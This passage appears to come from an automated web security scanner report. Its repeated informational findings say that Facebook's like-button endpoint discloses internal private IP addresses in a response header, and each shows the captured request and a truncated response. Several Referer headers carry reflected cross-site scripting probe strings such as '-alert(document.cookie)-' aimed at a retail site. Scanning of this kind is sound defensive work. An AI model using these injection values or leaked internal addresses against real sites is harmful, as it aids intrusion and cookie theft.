The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1baeb5cbc%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff38148ebcc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.104
X-Cnection: close
Date: Mon, 16 May 2011 10:21:28 GMT
Content-Length: 8357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.62. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.171.116
X-Cnection: close
Date: Mon, 16 May 2011 10:41:32 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.63. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.220.128
X-Cnection: close
Date: Mon, 16 May 2011 10:23:41 GMT
Content-Length: 6429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.64. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.115.65
X-Cnection: close
Date: Mon, 16 May 2011 01:53:51 GMT
Content-Length: 6429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.65. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.104
X-Cnection: close
Date: Mon, 16 May 2011 10:24:30 GMT
Content-Length: 6320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.66. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.106
X-Cnection: close
Date: Mon, 16 May 2011 10:23:40 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.67. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.124.53
X-Cnection: close
Date: Mon, 16 May 2011 01:53:50 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.68. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.224.27
X-Cnection: close
Date: Mon, 16 May 2011 01:55:01 GMT
Content-Length: 6304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.69. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.32
X-Cnection: close
Date: Mon, 16 May 2011 01:59:19 GMT
Content-Length: 6401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.70. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.183.119
X-Cnection: close
Date: Mon, 16 May 2011 10:42:02 GMT
Content-Length: 6489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.71. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.109
X-Cnection: close
Date: Mon, 16 May 2011 10:23:41 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.72. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.158.102
X-Cnection: close
Date: Mon, 16 May 2011 10:40:47 GMT
Content-Length: 6501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.73. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.23
X-Cnection: close
Date: Mon, 16 May 2011 01:58:56 GMT
Content-Length: 6370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.74. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.179.107
X-Cnection: close
Date: Mon, 16 May 2011 10:41:33 GMT
Content-Length: 6497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.75. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.211.25
X-Cnection: close
Date: Mon, 16 May 2011 01:53:51 GMT
Content-Length: 6429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.76. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.123.61
X-Cnection: close
Date: Mon, 16 May 2011 01:53:22 GMT
Content-Length: 6352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.77. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.195.126
X-Cnection: close
Date: Mon, 16 May 2011 10:42:01 GMT
Content-Length: 6489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.78. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.197.125
X-Cnection: close
Date: Mon, 16 May 2011 10:41:53 GMT
Content-Length: 6484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.79. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
